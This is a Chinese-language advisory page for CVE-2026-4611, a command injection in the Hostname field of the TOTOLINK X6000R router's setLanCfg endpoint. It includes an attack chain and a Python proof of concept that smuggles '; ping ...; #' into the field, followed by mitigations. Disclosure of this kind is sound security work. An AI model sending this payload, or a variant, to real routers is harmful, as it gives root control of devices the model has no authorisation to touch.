CVE-2026-4611 TOTOLINK X6000R OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-4611

漏洞类型

操作系统命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

TOTOLINK X6000R

漏洞概述

TOTOLINK X6000R路由器在特定固件版本中存在严重的操作系统命令注入漏洞。该漏洞源于文件/usr/sbin/shttpd中的setLanCfg函数未能正确过滤用户提供的Hostname参数。由于认证要求为高权限，攻击者通常需要具备管理员权限。一旦具备权限，攻击者可以通过网络向受影响设备发送特制的恶意数据包，利用Hostname参数注入并执行任意系统命令。成功利用此漏洞可能导致攻击者完全控制设备，窃取敏感信息、篡改系统配置或导致设备拒绝服务，对机密性、完整性和可用性造成严重影响。

技术细节

该漏洞位于TOTOLINK X6000R路由器的Web服务器组件shttpd（路径：/usr/sbin/shttpd）中。具体受影响的接口是setLanCfg，该接口主要用于处理局域网（LAN）配置的设置请求，其中包括主机名的配置。在代码实现层面，开发人员未对用户传入的Hostname参数进行严格的输入验证或安全过滤，直接将其传递给了后端的系统调用函数（如system()或popen()）。

由于CVSS向量指出权限要求为高（PR:H），攻击者首先需要获取路由器的管理员权限或绕过认证机制。在获取高权限会话后，攻击者可以在Hostname字段中注入恶意的Shell元字符（例如分号;、管道符|、或命令替换$()）。当后端程序执行配置更新命令时，注入的恶意命令将与合法的系统命令拼接并一同被执行。鉴于嵌入式Web服务通常以root权限运行，这将导致攻击者获得目标设备的最高控制权，从而进一步植入后门、窃听流量或进行横向移动。

攻击链分析

STEP 1

侦查与发现

攻击者扫描网络，识别出TOTOLINK X6000R设备及其固件版本。

STEP 2

获取权限

利用弱口令爆破、默认凭证或其他漏洞获取路由器的管理员Web界面权限（满足PR:H要求）。

STEP 3

构造恶意载荷

攻击者构造包含Shell命令注入字符的HTTP POST请求，目标指向/cgi-bin/setLanCfg，并在Hostname参数中注入恶意命令。

STEP 4

执行注入

将恶意请求发送至服务器，后端shttpd程序解析Hostname参数并执行系统命令，注入的代码随之运行。

STEP 5

建立控制

命令执行成功后，攻击者获得Root Shell权限，可以安装后门、修改配置或完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the vulnerable endpoint
target_url = "http://<TARGET_IP>/cgi-bin/setLanCfg"

# The vulnerability is in the 'Hostname' argument.
# We inject a command to ping a controlled server to verify execution.
# Example payload: '; ping 192.168.1.100; #
payload = "; ping 192.168.1.100; #"

# Since PR:H (High Privileges) is required, we need a valid admin session.
# Replace 'COOKIE_VALUE' with a valid authenticated session cookie.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "uid=<COOKIE_VALUE>"
}

# Data payload including the malicious Hostname
data = {
    "Hostname": payload,
    # Other parameters might be needed depending on the specific form structure
}

try:
    response = requests.post(target_url, headers=headers, data=data, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

TOTOLINK X6000R 9.4.0cu.1360_B20241207

TOTOLINK X6000R 9.4.0cu.1498_B20250826

防御指南

临时缓解措施

如果无法立即升级固件，建议将路由器管理界面置于内网隔离环境，严格禁止通过互联网直接访问Web管理端口。同时，检查网络流量中是否存在针对/cgi-bin/setLanCfg接口的异常POST请求，并定期审计系统日志以发现潜在的入侵迹象。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4611
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4611
3 Details https://www.cvedetails.com/cve/CVE-2026-4611/
4 VulDB https://vuldb.com/cve/CVE-2026-4611
5 Link https://vuldb.com/?ctiid.352475
6 Link https://vuldb.com/?id.352475
7 Link https://vuldb.com/?submit.775642
8 Link https://www.totolink.net/